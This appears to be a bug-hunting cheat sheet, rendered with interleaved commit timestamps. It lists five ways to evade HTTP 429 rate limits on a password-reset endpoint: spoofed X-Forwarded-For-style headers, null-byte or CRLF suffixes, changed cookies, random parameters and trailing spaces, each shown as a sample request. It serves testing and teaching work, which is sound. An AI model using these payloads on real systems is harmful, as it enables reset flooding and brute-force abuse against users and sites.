2022-06-15 10:38:42 +00:00
|
|
|
# Bypass 429 (Too Many Requests)
|
|
|
|
|
2020-09-18 23:52:32 +00:00
|
|
|
1. Try add some custom header
|
|
|
|
```
|
|
|
|
X-Forwarded-For : 127.0.0.1
|
|
|
|
X-Forwarded-Host : 127.0.0.1
|
|
|
|
X-Client-IP : 127.0.0.1
|
|
|
|
X-Remote-IP : 127.0.0.1
|
|
|
|
X-Remote-Addr : 127.0.0.1
|
|
|
|
X-Host : 127.0.0.1
|
|
|
|
```
|
|
|
|
For example:
|
|
|
|
```
|
|
|
|
POST /ForgotPass.php HTTP/1.1
|
|
|
|
Host: target.com
|
|
|
|
X-Forwarded-For : 127.0.0.1
|
2022-07-09 15:35:32 +00:00
|
|
|
...
|
2020-09-18 23:52:32 +00:00
|
|
|
|
|
|
|
email=victim@gmail.com
|
|
|
|
```
|
|
|
|
|
|
|
|
2. Adding Null Byte ( %00 ) or CRLF ( %09, %0d, %0a ) at the end of the Email can bypass rate limit.
|
|
|
|
```
|
|
|
|
POST /ForgotPass.php HTTP/1.1
|
|
|
|
Host: target.com
|
2022-07-09 15:35:32 +00:00
|
|
|
...
|
2020-09-18 23:52:32 +00:00
|
|
|
|
|
|
|
email=victim@gmail.com%00
|
|
|
|
```
|
|
|
|
|
|
|
|
3. Try changing user-agents, cookies and IP address
|
|
|
|
```
|
|
|
|
POST /ForgotPass.php HTTP/1.1
|
|
|
|
Host: target.com
|
|
|
|
Cookie: xxxxxxxxxx
|
2022-07-09 15:35:32 +00:00
|
|
|
...
|
2020-09-18 23:52:32 +00:00
|
|
|
|
|
|
|
email=victim@gmail.com
|
|
|
|
```
|
|
|
|
Try this to bypass
|
|
|
|
```
|
|
|
|
POST /ForgotPass.php HTTP/1.1
|
|
|
|
Host: target.com
|
|
|
|
Cookie: aaaaaaaaaaaaa
|
2022-07-09 15:35:32 +00:00
|
|
|
...
|
2020-09-18 23:52:32 +00:00
|
|
|
|
|
|
|
email=victim@gmail.com
|
|
|
|
```
|
2020-09-19 00:03:32 +00:00
|
|
|
|
|
|
|
4. Add a random parameter on the last endpoint
|
|
|
|
```
|
|
|
|
POST /ForgotPass.php HTTP/1.1
|
|
|
|
Host: target.com
|
2022-07-09 15:35:32 +00:00
|
|
|
...
|
2020-09-19 00:03:32 +00:00
|
|
|
|
|
|
|
email=victim@gmail.com
|
|
|
|
```
|
|
|
|
Try this to bypass
|
|
|
|
```
|
|
|
|
POST /ForgotPass.php?random HTTP/1.1
|
|
|
|
Host: target.com
|
2022-07-09 15:35:32 +00:00
|
|
|
...
|
2020-09-19 00:03:32 +00:00
|
|
|
|
|
|
|
email=victim@gmail.com
|
|
|
|
```
|
|
|
|
|
|
|
|
5. Add space after the parameter value
|
|
|
|
```
|
|
|
|
POST /api/forgotpass HTTP/1.1
|
|
|
|
Host: target.com
|
2022-07-09 15:35:32 +00:00
|
|
|
...
|
2020-09-19 00:03:32 +00:00
|
|
|
|
|
|
|
{"email":"victim@gmail.com"}
|
|
|
|
```
|
|
|
|
Try this to bypass
|
|
|
|
```
|
|
|
|
POST /api/forgotpass HTTP/1.1
|
|
|
|
Host: target.com
|
2022-07-09 15:35:32 +00:00
|
|
|
...
|
2020-09-19 00:03:32 +00:00
|
|
|
|
|
|
|
{"email":"victim@gmail.com "}
|
|
|
|
```
|
2022-06-15 10:38:42 +00:00
|
|
|
|
|
|
|
## References
|
|
|
|
* [Huzaifa Tahir](https://huzaifa-tahir.medium.com/methods-to-bypass-rate-limit-5185e6c67ecd)
|
|
|
|
* [Gupta Bless](https://gupta-bless.medium.com/rate-limiting-and-its-bypassing-5146743b16be)
|